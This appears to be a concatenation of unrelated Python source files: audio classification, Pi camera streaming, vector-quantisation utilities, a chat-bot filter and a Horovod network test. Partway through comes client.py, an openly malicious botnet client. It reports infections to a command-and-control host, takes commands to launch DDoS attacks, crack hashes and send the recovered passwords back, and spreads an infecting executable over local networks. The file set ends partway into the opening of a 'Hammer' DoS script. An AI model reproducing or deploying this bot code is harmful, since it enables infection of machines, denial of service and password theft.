infinite_duration = amount_of_seconds == -1
audio = pyaudio.PyAudio()
if ( validate_microphone_input(audio) == False ):
return None
if( infinite_duration ):
print( "Listening..." )
else:
print ( "Listening for " + str( amount_of_seconds ) + " seconds..." )
print ( "" )
listening_state['stream'] = audio.open(format=FORMAT, channels=classifier.get_setting('CHANNELS', CHANNELS),
rate=classifier.get_setting('RATE', RATE), input=True,
input_device_index=INPUT_DEVICE_INDEX,
frames_per_buffer=round( classifier.get_setting('RATE', RATE) * classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) / classifier.get_setting('SLIDING_WINDOW_AMOUNT', SLIDING_WINDOW_AMOUNT) ),
stream_callback=nonblocking_record)
classificationConsumer = threading.Thread(name='classification_consumer', target=classification_consumer, args=(audio, listening_state['stream'], classifier, persist_files, high_speed) )
classificationConsumer.setDaemon( True )
classificationConsumer.start()
actionConsumer = threading.Thread(name='action_consumer', target=action_consumer, args=(listening_state['stream'], classifier, dataDicts, persist_replay, replay_file, mode_switcher) )
actionConsumer.setDaemon( True )
actionConsumer.start()
listening_state['last_audio_update'] = time.time()
listening_state['stream'].start_stream()
ipc_manager.setParrotState("running")
while listening_state['currently_recording'] == True and listening_state['restart_listen_loop'] == False:
currenttime = time.time()
with KeyPoller() as key_poller:
if( not infinite_duration and currenttime - starttime > amount_of_seconds or manage_loop_state( "running", listening_state, mode_switcher, currenttime, STATE_POLLING_THRESHOLD, key_poller ) == False ):
listening_state['currently_recording'] = False
time.sleep(STATE_POLLING_THRESHOLD)
# Stop all the streams and different threads
listening_state['stream'].stop_stream()
listening_state['stream'].close()
audio.terminate()
listening_state['audioQueue'].queue.clear()
listening_state['classifierQueue'].queue.clear()
classificationConsumer.join()
actionConsumer.join()
# Restarting the listening loop is required when we are dealing with a different classifier
# As different classifiers might have different audio requirements
if (listening_state['restart_listen_loop'] == True):
classifier = load_running_classifier(ipc_manager.getClassifier())
listening_state['restart_listen_loop'] = False
listening_state['currently_recording'] = True
return start_nonblocking_listen_loop(classifier, mode_switcher, persist_replay, persist_files, amount_of_seconds, high_speed)
else:
return replay_file
def predict_wav_files( classifier, wav_files ):
dataDicts = []
audio_frames = []
print ( "Analyzing " + str( len( wav_files) ) + " audio files..." )
print ( "" )
for i in range( 0, PREDICTION_LENGTH ):
dataDict = {}
for directoryname in classifier.classes_:
dataDict[ directoryname ] = {'percent': 0, 'intensity': 0}
dataDicts.append( dataDict )
probabilities = []
for index, wav_file in enumerate( wav_files ):
highestintensity = get_highest_intensity_of_wav_file( wav_file, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) )
probabilityDict, predicted, frequency = predict_wav_file( wav_file, classifier, highestintensity )
winner = classifier.classes_[predicted]
#print( "Analyzing file " + str( index + 1 ) + " - Winner: %s - Percentage: %0d - Frequency: %0d " % (winner, probabilityDict[winner]['percent'], probabilityDict[winner]['frequency']) , end="\r")
probabilities.append( probabilityDict )
print( " ", end="\r" )
return probabilities
def predict_raw_data( wavData, classifier, intensity, power ):
# FEATURE ENGINEERING
first_channel_data = np.frombuffer( wavData, dtype=np.int16 )
if( classifier.get_setting('CHANNELS', CHANNELS) == 2 ):
first_channel_data = first_channel_data[::2]
data_row, frequency = feature_engineering_raw( first_channel_data, classifier.get_setting('RATE', RATE), intensity, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS),
classifier.get_setting('FEATURE_ENGINEERING_TYPE', FEATURE_ENGINEERING_TYPE) )
data = [ data_row ]
return create_probability_dict( classifier, data, frequency, intensity, power )
def predict_wav_file( wav_file, classifier, intensity ):
# FEATURE ENGINEERING
data_row, frequency = feature_engineering( wav_file, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS), classifier.get_setting('FEATURE_ENGINEERING_TYPE', FEATURE_ENGINEERING_TYPE) )
data = [ data_row ]
if( intensity < SILENCE_INTENSITY_THRESHOLD ):
return create_empty_probability_dict( classifier, data, frequency, intensity, 0 )
else:
return create_probability_dict( classifier, data, frequency, intensity, 0 )
def create_empty_probability_dict( classifier, data, frequency, intensity, power ):
probabilityDict = {}
index = 0
predicted = -1
for label in classifier.classes_:
winner = False
percent = 0
if( label == 'silence' ):
predicted = index
percent = 100
winner = True
probabilityDict[ label ] = { 'percent': percent, 'intensity': int(intensity), 'winner': winner, 'frequency': frequency, 'power': power }
index += 1
if ('silence' not in classifier.classes_):
probabilityDict['silence'] = { 'percent': 100, 'intensity': int(intensity), 'winner': True, 'frequency': frequency, 'power': power }
return probabilityDict, predicted, frequency
def create_probability_dict( classifier, data, frequency, intensity, power ):
# Predict the outcome of the audio file
probabilities = classifier.predict_proba( data ) * 100
probabilities = probabilities.astype(int)
# Get the predicted winner
predicted = np.argmax( probabilities[0] )
if( isinstance(predicted, list) ):
predicted = predicted[0]
probabilityDict = {}
for index, percent in enumerate( probabilities[0] ):
label = classifier.classes_[ index ]
probabilityDict[ label ] = { 'percent': percent, 'intensity': int(intensity), 'winner': index == predicted, 'frequency': frequency, 'power': power }
if ('silence' not in classifier.classes_):
probabilityDict['silence'] = { 'percent': 100, 'intensity': int(intensity), 'winner': False, 'frequency': frequency, 'power': power }
return probabilityDict, predicted, frequency
# Load in a classifier that also sets the classifier state during runtime
def load_running_classifier( classifier_name ):
if( classifier_name != "dummy" ):
print( "Loading classifier " + CLASSIFIER_FOLDER + "/" + classifier_name + ".pkl" )
classifier = joblib.load( CLASSIFIER_FOLDER + "/" + classifier_name + ".pkl" )
if( not isinstance( classifier, AudioModel ) ):
settings = {
'version': 0,
'RATE': RATE,
'CHANNELS': CHANNELS,
'RECORD_SECONDS': RECORD_SECONDS,
'SLIDING_WINDOW_AMOUNT': SLIDING_WINDOW_AMOUNT,
'FEATURE_ENGINEERING_TYPE': FEATURE_ENGINEERING_TYPE
}
classifier = AudioModel( settings, classifier )
ipc_manager.setClassifier(classifier_name)
else:
print( "Loading dummy classifier for testing purposes" )
from lib.dummy_classifier import DummyClassifier
classifier = DummyClassifier()
ipc_manager.setClassifier("dummy")
return classifier
# Validate and print the currently used microphone
def validate_microphone_input( audio ):
try:
micDict = audio.get_device_info_by_index( INPUT_DEVICE_INDEX )
if (micDict and micDict['maxInputChannels'] > 0):
print( "Using input from " + micDict['name'] )
return True
else:
raise IOError( "Invalid number of channels" )
except IOError as e:
print( "------ ERROR - NO VALID MICROPHONE FOUND DURING START UP ------ " )
print( "Make sure your microphone is connected before starting up Parrot" )
print( "or change the INPUT_DEVICE_INDEX in the config/config.py file.")
print( "And rerun Parrot to have the proper connection" )
print( "---------------------------------------------------------------")
return False
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 20
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = True
HFLIP = True
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/dashboard')
self.end_headers()
return
elif self.path == '/jsmpg.js':
content_type = 'application/javascript'
content = self.server.jsmpg_content
elif self.path == '/bootstrap.css':
content_type = 'text/css'
content = self.server.bootstrap_content
elif self.path == '/style.css':
content_type = 'text/css'
content = self.server.style_content
elif self.path == '/jquery.js':
content_type = 'application/javascript'
content = self.server.jquery_content
elif self.path == '/bootstrap.js':
content_type = 'application/javascript'
content = self.server.bootstrap_js_content
elif self.path == '/popper.js':
content_type = 'application/javascript'
content = self.server.popper_content
elif self.path == '/script.js':
content_type = 'application/javascript'
content = self.server.script_content
elif self.path == '/live':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.live_stream_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
elif self.path == '/configuration':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.configuration_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
elif self.path == '/dashboard':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.dashbaord_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
# posting of commands will happen here
# stuff like configuring the router and camera parameters
# as well as the mqtt messages and starting/ stoping the camera
def do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
# here we do the parsing of the header to make changes to the camera's state
if self.path == "/SetResolution":
pass
elif self.path == "/SetFramerate":
pass
elif self.path == "/SetMotionDetectionParams":
pass
elif self.path == "/SetCredentials":
pass
elif self.path == "/GetConfigurationInformation":
pass
pass
class StreamingHttpServer(HTTPServer):
def __init__(self):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
with io.open('static/jsmpg.js', 'r') as f:
self.jsmpg_content = f.read()
with io.open('static/bootstrap.css', 'r') as f:
self.bootstrap_content = f.read()
with io.open('static/jquery.js', 'r') as f:
self.jquery_content = f.read()
with io.open('static/script.js', 'r') as f:
self.script_content = f.read()
with io.open('static/popper.js', 'r') as f:
self.popper_content = f.read()
with io.open('static/bootstrap.js', 'r') as f:
self.bootstrap_js_content = f.read()
with io.open('static/style.css', 'r') as f:
self.style_content = f.read()
with io.open('templates/livestream.html', 'r') as f:
self.live_stream_template = f.read()
with io.open('templates/dashboard.html', 'r') as f:
self.dashbaord_template = f.read()
with io.open('templates/configuration.html', 'r') as f:
self.configuration_template = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
utils.py
|
# Copyright 2015, Yahoo Inc.
# Licensed under the terms of the Apache License, Version 2.0. See the LICENSE file associated with the project for terms.
import numpy as np
import multiprocessing
from itertools import chain
def iterate_splits(x, splits):
"""
A helper to iterate subvectors.
:param ndarray x:
a vector to iterate over
:param int splits:
the number of subvectors
:returns (np.array, int):
subvector, split index pairs
"""
split_size = len(x) / splits
for split in xrange(splits):
start = split * split_size
yield x[start:start + split_size], split
def concat_new_first(arrs):
"""
Helper to concatenate a list of ndarrays along a new first dimension.
"""
arrs = map(lambda x: x[np.newaxis, ...], arrs)
return np.concatenate(arrs, axis=0)
def predict_cluster(x, centroids):
"""
Given a vector of dimension D and a matrix of centroids of dimension VxD,
return the id of the closest cluster
:params np.array x:
the data to assign
:params np.array centroids:
a matrix of cluster centroids
:returns int:
cluster assignment
"""
return ((x - centroids) ** 2).sum(axis=1).argmin(axis=0)
def load_xvecs(filename, base_type='f', max_num=None):
"""
A helper to read in sift1m binary dataset. This parses the
binary format described at http://corpus-texmex.irisa.fr/.
:returns ndarray:
a N x D array, where N is the number of observations
and D is the number of features
"""
import os
import struct
format_code, format_size, py_type = {
'f': ('f', 4, float),
'i': ('I', 4, int),
'b': ('B', 1, float)
}[base_type]
size = os.path.getsize(filename)
f = open(filename, 'rb')
D = np.uint32(struct.unpack('I', f.read(4))[0])
N = size / (4 + D * format_size)
if max_num is None:
max_num = N
f.seek(0)
A = np.zeros((max_num, D), dtype=py_type)
for i in xrange(max_num):
for j in xrange(D + 1):
if j == 0:
np.uint32(struct.unpack(format_code, f.read(4)))
else:
A[i, j - 1] = py_type(struct.unpack(format_code, f.read(format_size))[0])
f.close()
return np.squeeze(A)
def save_xvecs(data, filename, base_type='f'):
"""
A helper to save an ndarray in the binary format as is expected in
load_xvecs above.
"""
import struct
format_code, format_size, py_type = {
'f': ('f', 4, float),
'i': ('I', 4, int),
'b': ('B', 1, float)
}[base_type]
f = open(filename, 'wb')
for d in data:
if hasattr(d, "__len__"):
D = len(d)
f.write(struct.pack('<I', D))
for x in d:
f.write(struct.pack(format_code, x))
else:
D = 1
f.write(struct.pack('<I', D))
f.write(struct.pack(format_code, d))
f.flush()
f.close()
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
"""
Parallel map implementation adapted from http://stackoverflow.com/questions/3288595/multiprocessing-using-pool-map-on-a-function-defined-in-a-class
"""
def func_wrap(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=func_wrap, args=(f, q_in, q_out)) for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
[p.terminate() for p in proc]
return [x for i, x in sorted(res)]
def get_chunk_ranges(N, num_procs):
"""
A helper that given a number N representing the size of an iterable and the num_procs over which to
divide the data return a list of (start_index, end_index) pairs that divide the data as evenly as possible
into num_procs buckets.
"""
per_thread = N / num_procs
allocation = [per_thread] * num_procs
allocation[0] += N - num_procs * per_thread
data_ranges = [0] + reduce(lambda acc, num: acc + [num + (acc[-1] if len(acc) else 0)], allocation, [])
data_ranges = [(data_ranges[i], data_ranges[i + 1]) for i in range(len(data_ranges) - 1)]
return data_ranges
def compute_codes_parallel(data, model, num_procs=4):
"""
A helper function that parallelizes the computation of LOPQ codes in
a configurable number of processes.
:param ndarray data:
an ndarray of data points
:param LOPQModel model:
a model instance to use to compute codes
:param int num_procs:
the number of processes to spawn
:returns iterable:
an iterable of computed codes in the input order
"""
def compute_partition(data):
return [model.predict(d) for d in data]
N = len(data)
partitions = [data[a:b] for a, b in get_chunk_ranges(N, num_procs)]
codes = parmap(compute_partition, partitions, num_procs)
return chain(*codes)
|
extensions.py
|
from time import sleep as slp
from threading import Thread
# from concurrent.futures import ThreadPoolExecutor
from contextlib import suppress
from unicodedata import normalize
from string import punctuation
from .local_amino import objects
from .Bot import Bot
class TimeOut:
users_dict = {}
def time_user(self, uid, end: int = 5):
if uid not in self.users_dict.keys():
self.users_dict[uid] = {"start": 0, "end": end}
Thread(target=self.timer, args=[uid]).start()
def timer(self, uid):
while self.users_dict[uid]["start"] <= self.users_dict[uid]["end"]:
self.users_dict[uid]["start"] += 1
slp(1)
del self.users_dict[uid]
def timed_out(self, uid):
if uid in self.users_dict.keys():
return self.users_dict[uid]["start"] >= self.users_dict[uid]["end"]
return True
class BannedWords:
def filtre_message(self, message, code):
para = normalize('NFD', message).encode(code, 'ignore').decode("utf8").strip().lower()
para = para.translate(str.maketrans("", "", punctuation))
return para
def check_banned_words(self, args):
for word in ("ascii", "utf8"):
with suppress(Exception):
para = self.filtre_message(args.message, word).split()
if para != [""]:
with suppress(Exception):
[args.subClient.delete_message(args.chatId, args.messageId, reason=f"Banned word : {elem}", asStaff=True) for elem in para if elem in args.subClient.banned_words]
class Parameters:
__slots__ = (
"subClient", "chatId", "authorId", "author", "message", "messageId",
"authorIcon", "comId", "replySrc", "replyMsg", "replyId", "info"
)
def __init__(self, data: objects.Event, subClient: Bot):
self.subClient: Bot = subClient
self.chatId: str = data.message.chatId
self.authorId: str = data.message.author.userId
self.author: str = data.message.author.nickname
self.message: str = data.message.content
self.messageId: str = data.message.messageId
self.authorIcon: str = data.message.author.icon
self.comId: str = data.comId
self.replySrc: str = None
self.replyId: str = None
if data.message.extensions and data.message.extensions.get('replyMessage', None) and data.message.extensions['replyMessage'].get('mediaValue', None):
self.replySrc = data.message.extensions['replyMessage']['mediaValue'].replace('_00.', '_hq.')
self.replyId = data.message.extensions['replyMessage']['messageId']
self.replyMsg: str = None
if data.message.extensions and data.message.extensions.get('replyMessage', None) and data.message.extensions['replyMessage'].get('content', None):
self.replyMsg: str = data.message.extensions['replyMessage']['content']
self.replyId: str = data.message.extensions['replyMessage']['messageId']
self.info: objects.Event = data
|
test_service.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import io
import queue
import threading
import time
import unittest
import warnings
import pytest
from horovod.runner.common.service.task_service import BasicTaskClient, BasicTaskService
from horovod.runner.common.util import network, secret
from horovod.runner.util.threads import in_thread
from horovod.runner.util.streams import Pipe
class SleepRequest(object):
pass
class TestSleepService(network.BasicService):
def __init__(self, key, duration):
super(TestSleepService, self).__init__('test sleep service', key, nics=None)
self._duration = duration
def _handle(self, req, client_address):
if isinstance(req, SleepRequest):
print('{}: sleeping for client {}'.format(time.time(), client_address))
time.sleep(self._duration)
return network.AckResponse()
return super(TestSleepService, self)._handle(req, client_address)
class TestSleepClient(network.BasicClient):
def __init__(self, service_addresses, key, attempts=1):
super(TestSleepClient, self).__init__('test sleep service',
service_addresses,
key,
verbose=2,
attempts=attempts)
def sleep(self):
self._send(SleepRequest())
class TestStreamService(network.BasicService):
def __init__(self, key, duration):
super(TestStreamService, self).__init__('test stream service', key, nics=None)
self._duration = duration
def _handle(self, req, client_address):
if isinstance(req, SleepRequest):
pipe = Pipe()
def sleep():
time.sleep(self._duration)
pipe.write('slept {}'.format(self._duration))
pipe.close()
in_thread(sleep)
return network.AckStreamResponse(), pipe
return super(TestStreamService, self)._handle(req, client_address)
class TestStreamClient(network.BasicClient):
def __init__(self, service_addresses, key, attempts=1):
super(TestStreamClient, self).__init__('test stream service',
service_addresses,
key,
verbose=2,
attempts=attempts)
def sleep(self, stream):
self._send(SleepRequest(), stream)
class NetworkTests(unittest.TestCase):
"""
Tests for horovod.runner.common.service.
"""
def __init__(self, *args, **kwargs):
super(NetworkTests, self).__init__(*args, **kwargs)
warnings.simplefilter('module')
def test_concurrent_requests_basic(self):
sleep = 2.0
key = secret.make_secret_key()
service = TestSleepService(key, duration=sleep)
try:
client = TestSleepClient(service.addresses(), key, attempts=1)
start = time.time()
threads = list([in_thread(client.sleep, daemon=False) for _ in range(1)])
for thread in threads:
thread.join(sleep + 1.0)
self.assertFalse(thread.is_alive(), 'thread should have terminated by now')
duration = time.time() - start
print('concurrent requests completed in {} seconds'.format(duration))
finally:
service.shutdown()
self.assertGreaterEqual(duration, sleep, 'sleep requests should have been completed')
self.assertLess(duration, sleep + 1.0, 'sleep requests should have been concurrent')
def test_shutdown_during_request_basic(self):
sleep = 2.0
key = secret.make_secret_key()
service = TestSleepService(key, duration=sleep)
try:
client = TestSleepClient(service.addresses(), key, attempts=1)
start = time.time()
threads = list([in_thread(client.sleep, name='request {}'.format(i+1), daemon=False) for i in range(5)])
time.sleep(sleep / 2.0)
finally:
service.shutdown()
duration = time.time() - start
print('shutdown completed in {} seconds'.format(duration))
self.assertGreaterEqual(duration, sleep, 'sleep requests should have been completed')
self.assertLess(duration, sleep + 1.0, 'sleep requests should have been concurrent')
for thread in threads:
thread.join(0.1)
self.assertFalse(thread.is_alive(), 'thread should have terminated by now')
def test_shutdown_during_request_basic_task(self):
result_queue = queue.Queue(1)
def wait_for_exit_code(client, queue):
queue.put(client.wait_for_command_exit_code())
key = secret.make_secret_key()
service_name = 'test-service'
service = BasicTaskService(service_name, 0, key, nics=None, verbose=2)
try:
client = BasicTaskClient(service_name, service.addresses(), key, verbose=2, attempts=1)
thread = threading.Thread(target=wait_for_exit_code, args=(client, result_queue))
start = time.time()
thread.start() # wait for command exit code
client.run_command('sleep 2', {}) # execute command
time.sleep(0.5) # give the thread some time to connect before shutdown
finally:
service.shutdown() # shutdown should wait on request to finish
duration = time.time() - start
self.assertGreaterEqual(duration, 2)
# we cannot call after shutdown
with pytest.raises(Exception, match=r'^(\[[Ee]rrno 104\] Connection reset by peer)'
r'|(\[[Ee]rrno 111\] Connection refused)$'):
client.command_result()
# but still our long running request succeeded
thread.join(1.0)
self.assertFalse(thread.is_alive())
def test_exit_code(self):
"""test non-zero exit code"""
key = secret.make_secret_key()
service_name = 'test-service'
service = BasicTaskService(service_name, 0, key, nics=None, verbose=2)
try:
client = BasicTaskClient(service_name, service.addresses(), key, verbose=2, attempts=1)
client.run_command('false', {})
res = client.wait_for_command_exit_code()
self.assertEqual(1, res)
finally:
service.shutdown()
def test_stream(self):
sleep = 2.0
key = secret.make_secret_key()
service = TestStreamService(key, duration=sleep)
try:
client = TestStreamClient(service.addresses(), key, attempts=1)
start = time.time()
stream = io.StringIO()
client.sleep(stream)
duration = time.time() - start
self.assertEqual(f'slept {sleep}', stream.getvalue())
self.assertGreaterEqual(duration, 2)
finally:
service.shutdown()
|
client.py
|
#!/usr/bin/python
import socket
import threading
import time
import hashlib
import local_network_attack
import attack_list
import DDOSAttack
#confugure
cnc_ip = "your cnc ip"
cnc_port = 8080 #your cnc ip port, default is 8080
executable = "executable to infect with"
##############################################################
global cracking_processes
cracking = False
global id_num
id_num = '0'
global local_attack
local_attack = False
global local_attack_var
local_attack_var = None
global list_attack_var
list_attack_var = None
global ddos_var
ddos_var = None
####### utils: ############################
def get_public_ip(): #gets the public ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("ifconfig.me" , 80))
s.sendall("GET / HTTP/1.1\r\nHost: ifconfig.me\r\n\r\n")
data = s.recv(4096)
ip = data.split('\n')
ip = ip[len(ip)-1]
s.close()
return ip
############ bot command functions ####################
def ddos(message,conn,addr): #starts ddos attack
target = message.split(" ")[1]
print("ddos %s" %target)
global ddos_var
if ddos_var:
pass
else:
print("ddos started %s" %target)
ddos_var = DDOSAttack
ddos_var.attack(target)
def stop_ddos(message,conn,addr): #stops ddos attack
if ddos_var:
ddos_var.stop()
print("try ddos stopped")
def send_message(msg,cnc_ip,cnc_port): #sends message to cnc
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, int(cnc_port)))
sock.send(msg.encode())
sock.close()
def crack(message,conn,addr): #starts hash cracking
with open("rockyou.txt","r") as f:
lines = f.readlines()
index1 = int(message.split(" ")[3])
index2 = int(message.split(" ")[4])
hash_str = message.split(" ")[1]
hash_type = message.split(" ")[2]
print(index1, index2,hash_str,hash_type)
for i in range(index1,index2):
global cracking
if not cracking:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "crack stopped %s" % (hash_str)
sock.send(msg.encode())
sock.close()
return
word = lines[i][:-1]
m = hashlib.new(hash_type)
m.update(word)
if (m.hexdigest() == hash_str):
print("cracked: %s %s on the %s attempt" % (hash_str,word,i))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "cracked %s %s" % (hash_str,word)
sock.send(msg.encode())
sock.close()
return
print("fail")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "crack failed %s" % (hash_str)
sock.send(msg.encode())
sock.close()
return
############### client settings ######################
def infected(port): #sends cnc infection message
global id_num
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "infected: " + str(port)
sock.send(msg.encode())
data = sock.recv(8000)
id_num = data.decode('utf-8').strip('\r\n')
print("my id is: %s" % id_num)
sock.close()
def pong(conn,addr):
conn.send("pong".encode())
conn.close()
def on_message(message,conn,addr): #handels incoming message
global id_num
global cracking
global local_attack
global local_attack_var
global list_attack_var
message = str(message.encode('ascii', 'ignore'))
print("got message",message)
if "scan" in message:
scan(message,conn,addr)
elif 'stop ddos' in message:
stop_ddos(message,conn,addr)
elif 'ddos' in message:
ddos(message,conn,addr)
elif "ping" in message:
pong(conn,addr)
elif "stop crack" in message:
cracking = False
elif "crack" in message:
cracking = True
crack(message,conn,addr)
elif "stop local attack" in message:
local_attack = False
print("try to stop me! %s" % (local_attack_var))
if local_attack_var:
local_attack_var.stop()
local_attack_var = None
elif "local attack" in message:
if local_attack_var:
pass
else:
local_attack = True
local_attack_var = local_network_attack
local_attack_var.scan_and_attack(cnc_ip,cnc_port,executable,False,False,id_num)
elif "stop list attack" in message:
list_attack = False
print("try to stop me! %s" % (list_attack_var))
if list_attack_var:
list_attack_var.stop()
list_attack_var = None
elif "list attack" in message:
if list_attack_var:
pass
else:
list_attack = True
list_attack_var = attack_list
lst = message.split(" ")[2]
if ',' in lst:
lst = lst.split(",")
list_attack_var.attack_list(lst,cnc_ip,cnc_port,executable,False,False,id_num)
else:
new = []
new.append(lst)
list_attack_var.attack_list(new,cnc_ip,cnc_port,executable,False,False,id_num)
def listen(): #starts bot server
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind(('0.0.0.0', 0))
serv.listen(5)
port = serv.getsockname()[1]
ip = serv.getsockname()[0]
print("started server on %s %s" % (ip,port))
infected(port)
while True:
conn, addr = serv.accept()
data = conn.recv(1024)
if not data:
break
msg = data.decode('utf-8').strip('\r\n')
x = threading.Thread(target=on_message, args=(msg,conn,addr))
x.setDaemon(True)
x.start()
listen()
|
newfile.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# python 3.3.2+ Hammer Dos Script v.1
# by Can Yalçın
# only for legal purpose
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
